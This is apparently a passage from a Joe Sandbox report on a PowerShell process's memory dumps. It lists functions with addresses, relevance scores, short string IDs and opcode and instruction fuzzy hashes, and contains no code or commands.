                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$$]q$$]q
                                                                    • API String ID: 0-978391646
                                                                    • Opcode ID: d3bb7fb173469667d3728fca54f2b982c81de91c5a3b059efc25952d778536d4
                                                                    • Instruction ID: 47d5fc414b0cb7148fbf1ce0782c3c095fb6904a896df92cc99c594f82fe41c6
                                                                    • Opcode Fuzzy Hash: d3bb7fb173469667d3728fca54f2b982c81de91c5a3b059efc25952d778536d4
                                                                    • Instruction Fuzzy Hash: 27027EB4B012199FD714CF98C544A6ABBF3EF99305F24C069E9099B355CB32EC86CB91
                                                                    Function 07820390 Relevance: 3.9, Strings: 3, Instructions: 124COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q$$]q$$]q
                                                                    • API String ID: 0-182748909
                                                                    • Opcode ID: f726d5597a42929d07c3439bd2a94a43469f34141d93adae875d4aa27f8719c0
                                                                    • Instruction ID: af275aedd0769110e26d5d5c7689a5fd2936e180ff903ebaa9a8de255ae8be28
                                                                    • Opcode Fuzzy Hash: f726d5597a42929d07c3439bd2a94a43469f34141d93adae875d4aa27f8719c0
                                                                    • Instruction Fuzzy Hash: F9415AB2B002399FCB249E7D898066EF7E5EF94616B24C47ACC45EB200DB31D942C7A1
                                                                    Function 07820518 Relevance: 2.7, Strings: 2, Instructions: 175COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: tP]q$tP]q
                                                                    • API String ID: 0-145478062
                                                                    • Opcode ID: a232a37ba1abfd0b4b0661e7467d5058969e954d033832407c4f708dae035715
                                                                    • Instruction ID: ddfce49cf959486a97a233ef23aa70b5320648bd5e3fcf5b28ed63a789e2f457
                                                                    • Opcode Fuzzy Hash: a232a37ba1abfd0b4b0661e7467d5058969e954d033832407c4f708dae035715
                                                                    • Instruction Fuzzy Hash: 805167B27043668FC7158F68985066BFBB6AFD2212F18847BD544CB291CA32C886C3A1
                                                                    Function 07820370 Relevance: 2.6, Strings: 2, Instructions: 79COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q$$]q
                                                                    • API String ID: 0-127220927
                                                                    • Opcode ID: 1eafe71db6056bfca007481ab6c9173e2b6c9b7aaabd90b947687bec3114ed36
                                                                    • Instruction ID: a4698fab0af803dd53fee3573df6f05be80950cf5187a6d29b8b700021a5419f
                                                                    • Opcode Fuzzy Hash: 1eafe71db6056bfca007481ab6c9173e2b6c9b7aaabd90b947687bec3114ed36
                                                                    • Instruction Fuzzy Hash: A92148F190823ADFCB14CF6C8580265BFF4BF65206B298093CC88E7241D3309C82DBA1
                                                                    Function 07825750 Relevance: 1.5, Strings: 1, Instructions: 275COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: x.j
                                                                    • API String ID: 0-2488274842
                                                                    • Opcode ID: 546811bc0be40460a3ec8ceba02c69c7456195213f8817f21754e163405dc642
                                                                    • Instruction ID: f82cc6bc8a4d907a388313f8e18e92fb1f7e1897edca36f1407f1809ca9a7c99
                                                                    • Opcode Fuzzy Hash: 546811bc0be40460a3ec8ceba02c69c7456195213f8817f21754e163405dc642
                                                                    • Instruction Fuzzy Hash: 82B1A2B0B90215AFC704DB58C545B6EBBE3EF94315F2084A8D905AF395CB76DC82CBA1
                                                                    Function 0782573D Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: x.j
                                                                    • API String ID: 0-2488274842
                                                                    • Opcode ID: c466dbcac7c1e1de5460c2102f8125a323ec42dfc74141a68c63ca60f9e777b9
                                                                    • Instruction ID: 8ad2fb3051bdd07d32353b60998be02de653386c90f1ed618f09b1d5d157d9bd
                                                                    • Opcode Fuzzy Hash: c466dbcac7c1e1de5460c2102f8125a323ec42dfc74141a68c63ca60f9e777b9
                                                                    • Instruction Fuzzy Hash: 82A1B3B4A50215EFD714CF58C581BAEB7F2EF94315F2484A8D805AB391CB76DC92CBA0
                                                                    Function 0782674E Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: x.j
                                                                    • API String ID: 0-2488274842
                                                                    • Opcode ID: 065a1ac59da3bbf3f45a7292aa6815eb187afd8394c0df5f3a94cb385a785815
                                                                    • Instruction ID: 28265f53ec2bc87b3d45191695066f456c3b7897a1f2c7602dd95a49426eea26
                                                                    • Opcode Fuzzy Hash: 065a1ac59da3bbf3f45a7292aa6815eb187afd8394c0df5f3a94cb385a785815
                                                                    • Instruction Fuzzy Hash: A4318274B41214ABD7049B68C952F6F7AA3EFD5704F208828E9016F395CE7A9C428BF1
                                                                    Function 07824788 Relevance: .7, Instructions: 740COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 49dfc59dd22d99898cce659812a717ead188e5a6f540eda426334fc39380aa7b
                                                                    • Instruction ID: dd4628b27907998a548d18b4db7f07d81d69c965f3386b80916c27fb1dab5a3d
                                                                    • Opcode Fuzzy Hash: 49dfc59dd22d99898cce659812a717ead188e5a6f540eda426334fc39380aa7b
                                                                    • Instruction Fuzzy Hash: 20628BB4B002199FD714CF98C550E6ABBB2EF95315F20C0A9D8099F355CB76EC86CBA1
                                                                    Function 0782476C Relevance: .7, Instructions: 664COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b50ac4f5217748b40a34c728dbb3d4cd56e5d14064923fd91a5c543a7e51f63b
                                                                    • Instruction ID: 5be6db8556469df0e5320f50f9673f669804e82fcc99c0bee863732c428c2681
                                                                    • Opcode Fuzzy Hash: b50ac4f5217748b40a34c728dbb3d4cd56e5d14064923fd91a5c543a7e51f63b
                                                                    • Instruction Fuzzy Hash: 48529CB4A00255DFD710CF98C580E6ABBB2FBA5315F24C099D8099F355CB76EC86CBA1
                                                                    Function 07824A1F Relevance: .5, Instructions: 494COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c4ff52b6abc436e16a78b944eda1067fdc331e0d85ef167dd35bc2a6da647903
                                                                    • Instruction ID: 62fbc903efaa396fecc22cfd3b8a667d7bbe54f6e63dc8bc4c288a1b0356ec1c
                                                                    • Opcode Fuzzy Hash: c4ff52b6abc436e16a78b944eda1067fdc331e0d85ef167dd35bc2a6da647903
                                                                    • Instruction Fuzzy Hash: D5225AB4B00215DFD710CF98C590E6ABBB2EBA4715F24C099D8099F355CB76EC86CBA1
                                                                    Function 07824F6B Relevance: .4, Instructions: 438COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 952a08de351003419078ad3fb30b54141430cdc285aded20076ccd19119501ab
                                                                    • Instruction ID: 5c0747ee75fa125f835b01046dff6a0c8c20ddb1262cb5f48c86d6d08ff600d8
                                                                    • Opcode Fuzzy Hash: 952a08de351003419078ad3fb30b54141430cdc285aded20076ccd19119501ab
                                                                    • Instruction Fuzzy Hash: 75027BB4B00215DFD710CF98C590E6ABBB2EBA4715F14C099D8099F355CB76EC86CBA1
                                                                    Function 07824D49 Relevance: .4, Instructions: 420COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cb20e1ca91991073b142c7cdd1f72fe6e9fe03479a89914d7410bec6d04fc3ff
                                                                    • Instruction ID: 1aea0e941b378cc8808113953d7fbc505f669fdcc31681bdcbf7db216c658943
                                                                    • Opcode Fuzzy Hash: cb20e1ca91991073b142c7cdd1f72fe6e9fe03479a89914d7410bec6d04fc3ff
                                                                    • Instruction Fuzzy Hash: D90259B4B00215DFDB10CF98C590E6ABBB2EB94715F24C099D8099F355CB76EC86CBA1
                                                                    Function 078212CC Relevance: .4, Instructions: 404COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e68783a48eb1093c561cffefbbec9b97ec567569b801a64d9a632e2d2845763f
                                                                    • Instruction ID: 8eb112d927020935d88565d8a60e4a2e680131664f21bbcf15394b0bbde1ff5d
                                                                    • Opcode Fuzzy Hash: e68783a48eb1093c561cffefbbec9b97ec567569b801a64d9a632e2d2845763f
                                                                    • Instruction Fuzzy Hash: BEF18EB4B00219DFDB10CF58C584F6AB7B2EB95305F248069E9099F395CB76EC86CB91
                                                                    Function 07820DF0 Relevance: .4, Instructions: 389COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e079f987b9782bc79cacbfd2564dc75df8d05c245af61de8fb84c5120df753b5
                                                                    • Instruction ID: 4578be5672b855c3fa1aeff9b60f38dc81146193e8b351cc686725b29d8d7caa
                                                                    • Opcode Fuzzy Hash: e079f987b9782bc79cacbfd2564dc75df8d05c245af61de8fb84c5120df753b5
                                                                    • Instruction Fuzzy Hash: 03F16FB4B01219DFDB10CF58C584AAAB7F2FB95715F24C059E9089B351CB32EC86CB91
                                                                    Function 0782109E Relevance: .3, Instructions: 346COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4c1ce5d21a278eade93452894b3a30356ce5404cc5feb1a9e09cf8b392ef6287
                                                                    • Instruction ID: ecf79c01c575d9487e7396c2b8730e762c2f24c1d0b2a0e4fda5e3d32570b763
                                                                    • Opcode Fuzzy Hash: 4c1ce5d21a278eade93452894b3a30356ce5404cc5feb1a9e09cf8b392ef6287
                                                                    • Instruction Fuzzy Hash: EBE16DB4B01219DFD710CF98C584EAAB7B2FB99315F24C055E9099B391CB72EC82CB91
                                                                    Function 07829D4C Relevance: .1, Instructions: 124COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 664f3b33171579ae0cfea525226554ac8f272458239e9b4138e6645f36e06112
                                                                    • Instruction ID: 24b31d55b86a6631c9c82b309983f2dd7723bf4b56ec7cf9bbbac6752b134f85
                                                                    • Opcode Fuzzy Hash: 664f3b33171579ae0cfea525226554ac8f272458239e9b4138e6645f36e06112
                                                                    • Instruction Fuzzy Hash: C44118F5A142229FCB248E24C90567977A2AFA1255F1880AAD804EF295D736E883D7B1
                                                                    Function 07820880 Relevance: .1, Instructions: 94COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 12afc26549d5f4bb3dfdb9103bf0cdc5b836a0ba515924a835ffc306a7ab3f90
                                                                    • Instruction ID: c7201e689a8775a52777ca5e5a39cd4b4a4f0db31bc2a2fe5d7caa96dc87413f
                                                                    • Opcode Fuzzy Hash: 12afc26549d5f4bb3dfdb9103bf0cdc5b836a0ba515924a835ffc306a7ab3f90
                                                                    • Instruction Fuzzy Hash: 2C217EB1300325ABD7245A7D885073BB6DAEFD4716F3084299946CB391CD76D8C293B0
                                                                    Function 07820864 Relevance: .1, Instructions: 82COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7be4b225270d24961c9fca862aa044adefebd12803a9efa5a2da129cd17048c5
                                                                    • Instruction ID: b12d676032529763adb467d521c0c18bb3996d971781130481571e3b16303de2
                                                                    • Opcode Fuzzy Hash: 7be4b225270d24961c9fca862aa044adefebd12803a9efa5a2da129cd17048c5
                                                                    • Instruction Fuzzy Hash: C221ACB13043656BD7214E798850736BBE6EF91701F24846AE985CB2D2CE798CC6D3B1

                                                                    Non-executed Functions

                                                                    Function 092E29A8 Relevance: .0, Instructions: 14COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2559922258.00000000092E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 092E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_92e0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9bd1e46522786840485ebe34129dce998d6b8c91a245d10cbd1ce616cbee9bcd
                                                                    • Instruction ID: 1c0a63ecac5bde4a071eb8f8b91b675864712f4cfde63c3d4efb7e9e7a2b7e6e
                                                                    • Opcode Fuzzy Hash: 9bd1e46522786840485ebe34129dce998d6b8c91a245d10cbd1ce616cbee9bcd
                                                                    • Instruction Fuzzy Hash: 78D022608294B9CE876285180CA4AE43FA6888200034EE6B9E4901A029C61AD898C240
                                                                    Function 078216E8 Relevance: 14.2, Strings: 11, Instructions: 465COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$4']q$4']q$tP]q$tP]q$t~pq$$]q$$]q$$]q$$]q
                                                                    • API String ID: 0-107699449
                                                                    • Opcode ID: c788da58f8b1b76ef0905987af1710a000f6cb3431991a61585eb26a5a45758a
                                                                    • Instruction ID: 20cd705adcf197a4d8a905968030fa66a2e54f386fe4077f701d29e5c86ffd28
                                                                    • Opcode Fuzzy Hash: c788da58f8b1b76ef0905987af1710a000f6cb3431991a61585eb26a5a45758a
                                                                    • Instruction Fuzzy Hash: 22F146B1F0022A9FC7249F69844466ABBE6AFD5312F34847AD845CB251DF35CC83D7A2
                                                                    Function 07828918 Relevance: 14.1, Strings: 11, Instructions: 397COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$4']q$4']q$tP]q$tP]q$#j$$]q$$]q$$]q$$j
                                                                    • API String ID: 0-3280127866
                                                                    • Opcode ID: 240407dd07078e2c0857ef5ddde852c48b1b7b252cd43fcfa603de82fc9c5f89
                                                                    • Instruction ID: 1662e595f530ab305451a9a4ffc7afc21780e7074beaf2c94587e3a4ad0b7d2c
                                                                    • Opcode Fuzzy Hash: 240407dd07078e2c0857ef5ddde852c48b1b7b252cd43fcfa603de82fc9c5f89
                                                                    • Instruction Fuzzy Hash: BAD158B2704326DFCF148F29941077ABBE6AFA1712F14847AD841CB261DB35D887D7A2
                                                                    Function 07821EF8 Relevance: 12.8, Strings: 10, Instructions: 306COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                    • API String ID: 0-267665775
                                                                    • Opcode ID: e8e618dfbfb162b5e2f4c15d8fe8481c042b5ebfff5c410fe9799f0625b9ddd2
                                                                    • Instruction ID: c93780699e639ae47f65cbf2f043a66426d8820a369bfe7510062b14cecbfc5a
                                                                    • Opcode Fuzzy Hash: e8e618dfbfb162b5e2f4c15d8fe8481c042b5ebfff5c410fe9799f0625b9ddd2
                                                                    • Instruction Fuzzy Hash: 60A169B170432A9FC7258E389C54A3ABBE5BF91252F15807AD905CB251DF35D8C3D3A1
                                                                    Function 0782C850 Relevance: 11.5, Strings: 9, Instructions: 228COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$d%cq$d%cq$d%cq$d%cq$tP]q$tP]q$$]q
                                                                    • API String ID: 0-3118609902
                                                                    • Opcode ID: f0cc5e1d7ff837a518f084a0b1a50e72c0bf1f2636b5a0ba197190f5217c8ac3
                                                                    • Instruction ID: 3bddda772fa0f38f931d451a30c4d9f559892227bcca1f2f0396dacc596201f1
                                                                    • Opcode Fuzzy Hash: f0cc5e1d7ff837a518f084a0b1a50e72c0bf1f2636b5a0ba197190f5217c8ac3
                                                                    • Instruction Fuzzy Hash: FE71F5B1B002299FCB248F29C550A7EBBE6EF94715F24846AD801DB390DB35DD82D7B1
                                                                    Function 07823EA0 Relevance: 10.5, Strings: 8, Instructions: 498COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                    • API String ID: 0-3118171705
                                                                    • Opcode ID: 83d31a5c251e38138ad1a5e23cdf437ae5124138de68b4dab77e5cfae764d07f
                                                                    • Instruction ID: 16098f2416c3317b4810fc68fa9891cfb4cb15f49d675292208bb05af6d61d2b
                                                                    • Opcode Fuzzy Hash: 83d31a5c251e38138ad1a5e23cdf437ae5124138de68b4dab77e5cfae764d07f
                                                                    • Instruction Fuzzy Hash: DEF19EB17043A6DFCB188F79D45066ABBF5EFA1212F24846AD848CB251DB35CC82D771
                                                                    Function 078293E8 Relevance: 9.2, Strings: 7, Instructions: 493COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q
                                                                    • API String ID: 0-108373575
                                                                    • Opcode ID: 288a33157f4fd58b7b5ec662807a6ec9e04a80df415f9ef96721d67766ba72c4
                                                                    • Instruction ID: ccd6bb1d254e09da79833d041971b08cdb8d4dd98f0236b6a731cb7f8c60a8b8
                                                                    • Opcode Fuzzy Hash: 288a33157f4fd58b7b5ec662807a6ec9e04a80df415f9ef96721d67766ba72c4
                                                                    • Instruction Fuzzy Hash: 03F17BB2B043269FC7149F68941067ABBE5EFD1321F14807AD845DB2A1DF36E887C7A1
                                                                    Function 0782D0B4 Relevance: 9.0, Strings: 7, Instructions: 204COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$tP]q$tP]q$$]q$(cq$(cq$(cq
                                                                    • API String ID: 0-537408273
                                                                    • Opcode ID: 4f66bcccd7d10c04b913eb56294a7d5db9831e08b48a0ec708374197daecdd6b
                                                                    • Instruction ID: a11581d37a595ad17f2d06375fffc84809885bd128b3e59797f532185ca27eb7
                                                                    • Opcode Fuzzy Hash: 4f66bcccd7d10c04b913eb56294a7d5db9831e08b48a0ec708374197daecdd6b
                                                                    • Instruction Fuzzy Hash: EA71C2B0B00226DFDB248E14C544B6ABFF2AFA5716F198499E804DB290D731EDC2DB71
                                                                    Function 078238B8 Relevance: 7.8, Strings: 6, Instructions: 281COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: W$tP]q$tP]q$$]q$$]q$$]q
                                                                    • API String ID: 0-2560603547
                                                                    • Opcode ID: 9bb9ab207ab6113f9dfbecb213990203b9878c9e79b12b7e06bb14a29c34ac8a
                                                                    • Instruction ID: 8bdaea4a29c66c091d229ffed7a52cbfc5e8936f3306e9bf54efc62a6cbd064a
                                                                    • Opcode Fuzzy Hash: 9bb9ab207ab6113f9dfbecb213990203b9878c9e79b12b7e06bb14a29c34ac8a
                                                                    • Instruction Fuzzy Hash: 8F916BB17043269FC7248E698860767FBE6EF92712F24C47BD445CB691DA39C883C791
                                                                    Function 07820AD8 Relevance: 7.7, Strings: 6, Instructions: 211COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: tP]q$tP]q$$]q$$]q$$]q$$]q
                                                                    • API String ID: 0-656377573
                                                                    • Opcode ID: d202c0d767a138371241571d8acbe32913d2b6c04ecd68e8df754affa4a2d5be
                                                                    • Instruction ID: 2ae4b50f65f47fc546faf9b1b90dce57c1ffc1207f5e2b898cd86719ddb991ab
                                                                    • Opcode Fuzzy Hash: d202c0d767a138371241571d8acbe32913d2b6c04ecd68e8df754affa4a2d5be
                                                                    • Instruction Fuzzy Hash: 1F516DF23043255FD7248E699850B27BBE6EFD1326F14847AD544CB361CE36D886C3A1
                                                                    Function 0782C830 Relevance: 7.7, Strings: 6, Instructions: 161COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$d%cq$d%cq$d%cq$tP]q$$]q
                                                                    • API String ID: 0-3562389410
                                                                    • Opcode ID: f484d4f90a6881adec3308d4c1cc223e87b717db830c66684c5376803daaec0a
                                                                    • Instruction ID: 8b5e2399e1930159fb0773938c226fe4e213dea8da72c0d12682b42086817c99
                                                                    • Opcode Fuzzy Hash: f484d4f90a6881adec3308d4c1cc223e87b717db830c66684c5376803daaec0a
                                                                    • Instruction Fuzzy Hash: 5851E3F1A00226DFCB24CF15C540A7EBBE1AF65616F28846AD841DB291D731DDC2DBB1
                                                                    Function 0782D780 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$tP]q$$]q$$]q$$]q
                                                                    • API String ID: 0-2702571027
                                                                    • Opcode ID: f5d86218314b44d053b7a754f44ba2a8b57e950daacab4c83866a4709060b9b8
                                                                    • Instruction ID: c9b3f392f8544cd29176777bcca0b98b3c6849ce04a88b1531a04ca88ba26875
                                                                    • Opcode Fuzzy Hash: f5d86218314b44d053b7a754f44ba2a8b57e950daacab4c83866a4709060b9b8
                                                                    • Instruction Fuzzy Hash: C961BFF070422ADFDB248E15C544B7A7BE1AB65717F288466E801DB290CB35DCC2EBB1
                                                                    Function 0782CBCD Relevance: 6.4, Strings: 5, Instructions: 115COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
